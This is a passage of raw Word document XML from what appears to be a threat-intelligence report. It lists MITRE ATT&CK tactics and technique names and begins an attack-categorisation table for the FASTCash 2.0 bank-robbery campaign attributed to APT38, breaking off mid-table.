      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify System Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3B9A9"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5639EB"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1112 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8FA8C"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T1070.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B0ACFF"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E967D6"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T1027.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Software Packing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41553C"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1110', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586FA621"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1110 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4516D4"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B89B0DC"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1135', 'T1033', 'T1082', 'T1518.001', 'T1083', 'T1217', 'T1049', 'T1057']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52CCB2"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1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83D4A2"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F810A04" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00981B9C" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A1A04"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T1518.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Software Discovery&gt;:Security Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574C7C6"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20B2DF"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1217 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Browser Bookmark Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AFAD7"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5DE2E"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r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00981B9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059368B"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E564E"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1005', 'T1056.001', 'T1115']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3491B6B8"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B7627"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199090AF"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1115 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Clipboard Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B4D3C"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1105', 'T1071.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9ED175"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r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E9532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD66D77"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T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163240BB"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9F8E3" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00150193" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1529', 'T1485', 'T1486', 'T1561.002', 'T1565.001', 'T1565.002', 'T1565.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFDE3B9"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1529 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Shutdown/Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09160016"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1485 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DF13C"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1486 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Encrypted for Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC48D7"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T1561.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Disk Wipe&gt;:Disk Structure Wipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB322DD"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T1565.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Manipulation&gt;:Stored Data Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D726B" w14:textId="77777777" w:rsidR="00150193" w:rsidRPr="00150193"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T1565.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Manipulation&gt;:Transmitted Data Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF344DD" w14:textId="392B4F8F" w:rsidR="00150193" w:rsidRPr="005935F8" w:rsidRDefault="00150193" w:rsidP="00150193">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1565.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00150193">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Manipulation&gt;:Runtime Data Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BD187" w14:textId="2ACC5C5F" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="0042549C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc110935516"/>
      <w:bookmarkStart w:id="84" w:name="_Toc153480871"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD6C52" w:rsidRPr="00BD6C52">
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD6C52" w:rsidRPr="00BD6C52">
        <w:t xml:space="preserve"> 2.0: North Korea's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD6C52" w:rsidRPr="00BD6C52">
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD6C52" w:rsidRPr="00BD6C52">
        <w:t xml:space="preserve"> Robbing Banks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="13B1F526" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="0042549C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc110935517"/>
      <w:r>
        <w:t>Attack Categorisation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="0042549C" w:rsidRPr="002D1D50" w14:paraId="49DAC17A" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1662C3" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="002D1D50" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED78FE8" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="002D1D50" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EB8928B" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00387DCC" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C734F9" w:rsidRPr="00B857D7" w14:paraId="602E81EC" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6E8B7D" w14:textId="77777777" w:rsidR="00C734F9" w:rsidRDefault="00C734F9" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EEA2974" w14:textId="733B1E03" w:rsidR="00C734F9" w:rsidRDefault="00C734F9" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0845287A" w14:textId="77777777" w:rsidR="00C734F9" w:rsidRPr="00387DCC" w:rsidRDefault="00C734F9" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="5A7609ED" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683D3D22" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="007328DE" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="105F3D10" w14:textId="1BF37272" w:rsidR="0042549C" w:rsidRPr="007328DE" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r w:rsidR="00FB12EF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:r w:rsidR="00FB12EF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B63E05" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00387DCC" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="084FA5B8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D67A734" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
